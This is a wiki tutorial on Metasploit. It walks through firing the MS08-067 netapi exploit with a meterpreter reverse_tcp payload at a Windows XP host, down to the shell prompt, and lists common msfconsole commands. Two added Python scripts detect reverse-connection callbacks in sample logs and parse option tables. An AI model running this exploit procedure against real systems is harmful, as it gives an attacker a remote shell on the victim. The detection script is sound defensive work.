Metasploit
From SchnallIchNet
general example
running an exploit against netapi on a windows xp host
working for UNPATCHED WinXP-SP3 hosts...
 # msfconsole
 [snipped some info output]
 msf > search ms08_067

 Matching Modules
 ================

    Name                                 Disclosure Date  Rank   Description
    ----                                 ---------------  ----   -----------
    exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Microsoft Server Service Relative Path Stack Corruption

 msf > use exploit/windows/smb/ms08_067_netapi
 msf exploit(ms08_067_netapi) > set LHOST 10.0.my.host
 LHOST => 10.0.my.host
 msf exploit(ms08_067_netapi) > set RHOST 10.0.victim.host
 RHOST => 10.0.victim.host
 msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
 payload => windows/meterpreter/reverse_tcp
 msf exploit(ms08_067_netapi) > exploit

 [*] Started reverse handler on 10.0.my.host:4444
 [-] Exploit exception: The connection timed out (10.0.victim.host:445).
 [*] Exploit completed, but no session was created.
 msf exploit(ms08_067_netapi) >
and as you can see: the host is patched ;-)
explaining the output:
- 1st: start msfconsole
- search for the vulnerability/exploit ms08_067 and get the full path to the exploit module
- select the exploit with use
- set the local IP address (attacking host IP): LHOST
- set the remote IP address (victim host): RHOST
- set the payload to send to the victim host: windows/meterpreter/reverse_tcp, which opens a reverse TCP connection from the victim back to LHOST
- start exploiting: exploit
if the exploit was successful, you will get a prompt like this:
 meterpreter>
 meterpreter> shell
 [snipped output of starting windows cmd]
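From the defender's side, the part of the procedure above that is visible on the network is the victim host opening a reverse TCP connection back to the attacking host (LHOST, default handler port 4444) shortly after being contacted on SMB port 445. The following Python script is an added example and not part of the original wiki page: it looks for exactly that pairing in firewall log lines. The log lines, their key=value layout and the host addresses are constructed for the example; the matching does not depend on port 4444, because LPORT is whatever the person running the handler chose.

```python
import re
from datetime import datetime

# Constructed sample firewall log lines (not from the wiki page); the key=value
# layout is an assumption. 10.0.0.7 is contacted on SMB (445) by 10.0.0.5 and,
# two seconds later, connects back to 10.0.0.5 on 4444, the default LPORT of the
# reverse_tcp handler. 10.0.0.9 also touches SMB, but the connection back to it
# comes minutes later and falls outside the default window.
SAMPLE_LOG = """\
2024-03-01T10:00:01Z src=10.0.0.5 dst=10.0.0.7 dport=445 proto=tcp action=allow
2024-03-01T10:00:02Z src=10.0.0.9 dst=10.0.0.7 dport=445 proto=tcp action=allow
2024-03-01T10:00:03Z src=10.0.0.7 dst=10.0.0.5 dport=4444 proto=tcp action=allow
2024-03-01T10:05:00Z src=10.0.0.9 dst=10.0.0.7 dport=445 proto=tcp action=allow
2024-03-01T10:09:00Z src=10.0.0.7 dst=10.0.0.9 dport=4444 proto=tcp action=allow
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+) "
    r"proto=(?P<proto>\S+) action=(?P<action>\S+)$"
)


def parse_line(line):
    """Parse one log line into a dict, or return None for a line in another format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    event = m.groupdict()
    event["ts"] = datetime.strptime(event["ts"], "%Y-%m-%dT%H:%M:%SZ")
    event["dport"] = int(event["dport"])
    return event


def find_reverse_connections(log_text, service_port=445, handler_port=None, window_seconds=60):
    """Return (source, contacted_host, seconds) for every inbound connection to
    service_port that is followed within window_seconds by the contacted host
    opening a connection back to that same source.

    handler_port=None accepts any destination port for the connection back,
    since LPORT is configurable; pass 4444 to restrict to the Metasploit default.
    """
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    hits = []
    for inbound in events:
        if inbound["dport"] != service_port:
            continue
        for outbound in events:
            # The connection back must go from the contacted host to the contacting host.
            if outbound["src"] != inbound["dst"] or outbound["dst"] != inbound["src"]:
                continue
            if handler_port is not None and outbound["dport"] != handler_port:
                continue
            delta = (outbound["ts"] - inbound["ts"]).total_seconds()
            if 0 <= delta <= window_seconds:
                hits.append((inbound["src"], inbound["dst"], delta))
    return hits


if __name__ == "__main__":
    for src, host, secs in find_reverse_connections(SAMPLE_LOG):
        print(f"{host} connected back to {src} {secs:.0f}s after SMB contact")
```

The window is the tuning knob: the constructed log shows that 60 seconds catches the immediate callback and ignores the later one, while widening it to ten minutes also reports the two contacts from 10.0.0.9.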
useful commands
some useful commands...
search for a specific exploit
search ms08_067
show available exploits
show exploits
show all payloads
show payloads
show info about an exploit
info exploit exploit/windows/smb/ms08_067_netapi
show info about a payload
info payload windows/meterpreter/reverse_tcp
show options
if an exploit and/or payload is already set, it displays their options:
 msf exploit(ms08_067_netapi) > show options

 Module options (exploit/windows/smb/ms08_067_netapi):

    Name     Current Setting  Required  Description
    ----     ---------------  --------  -----------
    RHOST                     yes       The target address
    RPORT    445              yes       Set the SMB service port
    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

 Payload options (windows/meterpreter/reverse_tcp):

    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
    LHOST                      yes       The listen address
    LPORT     4444             yes       The listen port

 Exploit target:

    Id  Name
    --  ----
    0   Automatic Targeting

 msf exploit(ms08_067_netapi) >
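The `show options` table is what tells you which settings still need a value: in the output above, RHOST and LHOST are both required but have no current setting, which is why the module cannot run yet. As an added example that is not from the wiki page, the Python below parses that table layout (the copy embedded in the script reproduces the page's output, with assumed column spacing) and lists the required options that are still unset. Column boundaries are taken from the dashed underline rather than from whitespace splitting, so descriptions containing spaces and empty "Current Setting" cells are handled correctly.

```python
import re

# Constructed copy of the `show options` output shown on the page; the exact
# column spacing is an assumption about how msfconsole aligns the table.
SHOW_OPTIONS = """\
Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
"""


def parse_show_options(text):
    """Parse `show options` output into {module_path: {OPTION_NAME: row_dict}}.

    Each row_dict maps the header names (Name, Current Setting, Required,
    Description) to the cell text; an unset option has Current Setting == "".
    """
    tables = {}
    lines = text.splitlines()
    module = None
    for idx, line in enumerate(lines):
        m = re.match(r"^(?:Module|Payload) options \((\S+)\):$", line)
        if m:
            module = m.group(1)
            tables[module] = {}
            continue
        if line.startswith("Exploit target"):
            module = None  # the target table has a different layout; skip it
            continue
        if module is None or not re.fullmatch(r"\s*-+(?:\s+-+)*\s*", line):
            continue
        # The dashed underline fixes the column starts; names come from the line above.
        starts = [mm.start() for mm in re.finditer(r"-+", line)]
        bounds = list(zip(starts, starts[1:] + [None]))
        header = lines[idx - 1]
        names = [header[s:e].strip() for s, e in bounds]
        for row in lines[idx + 1:]:
            if not row.strip():
                break  # blank line ends the table
            cells = [row[s:e].strip() for s, e in bounds]
            entry = dict(zip(names, cells))
            tables[module][entry["Name"]] = entry
    return tables


def missing_required(tables):
    """Return (module_path, option) for every required option without a value."""
    return [
        (module, name)
        for module, rows in tables.items()
        for name, row in rows.items()
        if row.get("Required") == "yes" and row.get("Current Setting") == ""
    ]


if __name__ == "__main__":
    for module, option in missing_required(parse_show_options(SHOW_OPTIONS)):
        print(f"{module}: {option} is required but not set")
```

Run against the embedded copy it reports RHOST for the exploit module and LHOST for the payload, matching what a reader sees by eye in the table above; the same function works on any module's `show options` output pasted from a session log.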